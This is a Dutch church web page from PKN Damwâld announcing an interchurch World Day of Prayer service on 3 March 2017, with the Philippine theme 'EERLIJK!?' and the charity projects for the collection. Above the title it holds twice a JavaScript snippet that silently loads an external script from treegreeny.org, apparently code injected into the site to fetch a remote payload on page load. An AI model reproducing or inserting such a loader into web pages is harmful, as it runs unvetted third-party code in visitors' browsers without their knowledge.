;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Wereldgebedsdag in Damwâld - PKN Damwâld

Viering Wereldgebedsdag in Damwâld

Gepubliceerd op: dinsdag 7 februari 2017

De wereldgebedsdienstcommissie Damwâld nodigt iedereen uit om op vrijdag 3 maart om 19.30 uur de jaarlijkse interkerkelijke gebedsdienst bij te wonen in de Doopsgezinde Kerk aan de Doniawei in Damwâld.

De orde van dienst voor 2017 is gemaakt door het Wereldgebedsdagcomité uit de Filipijnen.  Als  thema is gekozen: EERLIJK!?  Bijgaande afbeelding geeft de draagkracht van vrouwen weer, maar ook de taken waar zij iedere dag opnieuw weer voor komen  te  staan. De kerk heet alle mensen welkom en laat hen voelen dat  iedereen welkom is in het koninkrijk van God: dat wordt door de lange  tafel met  voedsel, gedragen door de vrouwen, gesymboliseerd. God is de oorsprong van de hele schepping. God gaf de Filipijnen heel veel: de mensen die er wonen, de prachtige natuur, het klimaat en heel  veel grondstoffen. God zorgt voor iedereen, ook voor degenen die Hem niet erkennen. Gods rechtvaardigheid staat haaks op de Filipijnse maatschappij  waar momenteel sterke en invloedrijke families de middelen, die God aan allen heeft geschonken, gebruiken voor zichzelf en hun familieleden.

Medewerking aan de viering wordt verleend door het mannenkoor ‘Sjongersnocht’ uit Damwâld. De collecteopbrengst is bestemd voor 4 projecten op de Filipijnen, te weten: Stichting Velo Velo, stichting Ronoylion, Betanny Childeren’s Home en Bethunehuis. Van harte welkom !